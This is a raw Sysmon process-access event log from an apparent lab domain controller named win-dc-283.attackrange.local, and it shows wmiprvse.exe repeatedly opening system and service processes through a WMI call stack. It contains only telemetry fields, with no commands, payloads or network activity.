15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024748Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024747Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024746Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024745Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024744Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024743Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024742Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024741Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024740Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024739Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024738Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024737Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024736Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024735Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024734Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024733Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024732Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024731Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024730Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024729Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 